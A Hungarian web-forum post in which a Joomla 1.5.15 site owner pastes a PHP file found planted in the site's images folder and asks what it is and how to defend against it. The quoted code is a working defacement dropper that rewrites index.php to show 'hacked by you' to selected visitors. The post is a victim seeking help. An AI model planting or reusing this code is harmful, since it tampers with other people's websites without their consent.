Hirdetés
-
Computex 2024: Íme a Project NeonStorm
ph Alaposan összetömörítette a PCIe 5.0 x4 SSD hűtését szolgáló vizes rendszert az ADATA.
-
Megjelenési dátumot kapott a Conscript
gp Az I. Világháborús horror játék jövő hónapban érkezik.
-
Spyra: nagynyomású, akkus, automata vízipuska
lo Type-C port, egy töltéssel 2200 lövés, több, mint 2 kg-os súly, automata víz felszívás... Start the epic! :)
Új hozzászólás Aktív témák
-
Ra's al Ghul
senior tag
Sziasztok!
Egy kis segítséget szeretnék kérni. A weboldalamon a Joomla 1.5.15 verziója fut. A lényeg az, hogy az képek mappában (/images/) találtam egy cell.pHp fájlt amiben biztos vagyok, hogy nem én raktam oda. A fájlt megnyitva a következő php kód fogad:
?><?php
echo '[vuln]';
$e=$_SERVER[DOCUMENT_ROOT].'/index.php';
if (!is_writable($e)) exit;
$b=@file_get_contents($e);
$i=strrev("uoy yb dekcah");
if(strpos($b,$i))exit;
$c='<?php $r=$_SERVER["REMOTE_ADDR"];if((preg_match("/69.42./",$r)) OR (preg_match("/compatible; MSIE 9.0; Windows NT 6.0; Trident\/5.0/i",$_SERVER["HTTP_USER_AGENT"])) OR (preg_match("/72.20./",$r)) OR (preg_match("/141.101./",$r)) OR(isset($_GET["z"]))){echo "'.$i.'";exit;}?>'."\r\n";
$b=$c.$b;
$f=fopen($e,"w");
fwrite($f,$b);
fclose($f);
?>Erre kérnék valami ötletet, hogy mi is lehet ez?
Ezen kívül a weboldal gyökérkönyvtárában találtam egy delete-me nevű gif fájlt (delet-me.gif), amit ha megnyítok akkor a következő fogad: "Hacked by Hmei7"
Van valami ötletetek, hogy miként lehet védekezni ilyen fajta támadások ellen?
[ Szerkesztve ]
Theatricality and deception are powerful agents to the uninitiated.
Új hozzászólás Aktív témák
Állásajánlatok
Cég: Ozeki Kft.
Város: Debrecen